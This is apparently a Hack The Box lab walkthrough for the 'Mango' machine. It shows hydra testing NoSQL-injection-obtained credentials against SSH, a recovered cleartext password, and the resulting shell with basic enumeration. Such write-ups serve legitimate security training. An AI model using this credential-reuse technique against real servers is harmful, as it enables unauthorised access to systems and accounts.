SSH
The target web application has a NoSQL injection vulnerability present in the POST data field of the login page; index.php
I was able to exploit the vulnerability and managed to [[Mango_NoSQLi#[NoSQL Injection](https //portswigger.net/web-security/nosql-injection)|exfiltrate]] 2 credentials for the web app.
While these 2 credentials has no use with the web app itself as the authenticated page appears static, I will test them against the target SSH server for password reuse
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ hydra -l users -p passwords ssh://$IP
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-09-28 20:24:29
[warning] many ssh configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4
[data] max 6 tasks per 1 server, overall 6 tasks, 6 login tries (l:3/p:2), ~1 try per task
[data] attacking ssh://10.10.10.162:22/
[22][ssh] host: 10.10.10.162 login: mango password: h3mXK8RhU~f{]f5H
1 of 1 target successfully completed, 1 valid password found
hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-09-28 20:24:35Password reuse confirmed for the mango user
The mango user is a valid system user
┌──(kali㉿kali)-[~/archive/htb/labs/mango]
└─$ ssh mango@$IP
The authenticity of host '10.10.10.162 (10.10.10.162)' can't be established.
ed25519 key fingerprint is sha256:tzYGTA/kNsB/kThvsmrv2uxaUS/2zS/grRQkrbN4+RE.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
warning: Permanently added '10.10.10.162' (ED25519) to the list of known hosts.
mango@10.10.10.162's password:
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.15.0-64-generic x86_64)
* documentation: https://help.ubuntu.com
* management: https://landscape.canonical.com
* support: https://ubuntu.com/advantage
system information as of thu sep 28 18:25:08 UTC 2023
system load: 0.08 Processes: 104
usage of /: 35.9% of 19.56GB Users logged in: 0
memory usage: 34% IP address for ens33: 10.10.10.162
swap usage: 0%
* Canonical Livepatch is available for installation.
- reduce system reboots and improve kernel security. activate at:
https://ubuntu.com/livepatch
122 packages can be updated.
18 updates are security updates.
failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
last login: Mon Sep 30 02:58:45 2019 from 192.168.142.138
mango@mango:~$ whoami
mango
mango@mango:~$ hostname
mango
mango@mango:~$ ifconfig
ens33: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1500
inet 10.10.10.162 netmask 255.255.255.0 broadcast 10.10.10.255
inet6 fe80::250:56ff:feb9:ab29 prefixlen 64 scopeid 0x20<link>
inet6 dead:beef::250:56ff:feb9:ab29 prefixlen 64 scopeid 0x0<global>
ether 00:50:56:b9:ab:29 txqueuelen 1000 (Ethernet)
RX packets 13064032 bytes 2291883044 (2.2 GB)
RX errors 0 dropped 43 overruns 0 frame 0
TX packets 12850937 bytes 6490520065 (6.4 GB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0
lo: flags=73<UP,LOOPBACK,RUNNING> mtu 65536
inet 127.0.0.1 netmask 255.0.0.0
inet6 ::1 prefixlen 128 scopeid 0x10<host>
loop txqueuelen 1000 (Local Loopback)
RX packets 92152 bytes 8031943 (8.0 MB)
RX errors 0 dropped 0 overruns 0 frame 0
TX packets 92152 bytes 8031943 (8.0 MB)
TX errors 0 dropped 0 overruns 0 carrier 0 collisions 0Initial Foothold established to the target system as the mango user via SSH